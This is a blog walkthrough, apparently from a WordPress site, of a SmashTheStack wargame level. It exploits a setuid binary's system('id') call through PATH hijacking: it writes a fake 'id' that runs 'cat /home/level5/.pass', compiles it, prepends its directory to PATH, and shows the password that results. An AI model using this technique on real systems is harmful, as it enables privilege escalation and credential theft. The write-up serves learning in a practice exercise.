Level 4 SmashTheStack Walkthrough

So, after a busy week of school and National Cyber League I finally got a chance to work on level 4.
Again, for level 4 we are given an executable binary and a C source code file. This time, when we run the binary all it does is gives us a list of UIDs and GIDs. It also seems to run with level 5 permissions.

level4@io:/levels$ ./level04
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1005(level5),1004(level4),1029(nosu)

Interesting. Ok, so now let’s look at the source code.

#include <stdlib.h>

int main() {
	
	system("id");

	return 0;
}

Looks like all it does is do a system call passing in id as an argument.
After researching a little and reading the man page, we find out that the system() command finds the program specified in the argument to execute by searching from left to right in an environment variable called PATH. According to Wikipedia,

“PATH is an environment variable on Unix-like operating systems, DOS, OS/2, and Microsoft Windows, specifying a set of directories where executable programs are located.”

If it finds the specified file within one of those directories it will execute it.
In this case, id is being passed in and the system() command searches through all the paths defined in the PATH until it finds it in the /usr/bin directory.
If we do an echo command we can see which directories have been defined in our PATH variable by the server.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

So now it becomes clear that we must modify the id program to print the .pass file located in /home/level5. When we go inside /usr/bin and try to modify it in VIM to cat the password file it looks like we are unable to because we don’t have the correct permissions. So now what?

Before we proceed further, remember that the system() command finds the program specified in its argument by searching from left to right through the set of directories defined in the PATH environment variable.
So what we try to do now is make a program called id in a directory that we have the permissions to modify files in, and export the directory to the beginning of the PATH variable to basically “catch” the call to the other id program when we run the level04 binary.

Based on the previous levels, we can assume that we have access to a /tmp/level4 directory which we can modify files in. After navigating ourselves to that directory, we open up a new C file in VIM and write a simple modified id program to print out the contents of the password file.

#include <stdio.h>
int main()
{
    system("cat /home/level5/.pass");
}

Then we compile it.

level4@io:/tmp/level4$ gcc -o id id.c

Our last step is to export this directory to the PATH variable.
We do this using the following command.

level4@io:/tmp/level4$ PATH=/tmp/level4:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Placing the path to the level4 directory in the beginning forces the system to search there first. When the modified id program is found within that directory, it discontinues searching and the original id program is never run.

Now when we run the level04 binary we should get the password.

level4@io:/levels$ ./level04
Zx5VdzACNMY9lQ

And there you have it! Onto level 5…

– JW

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s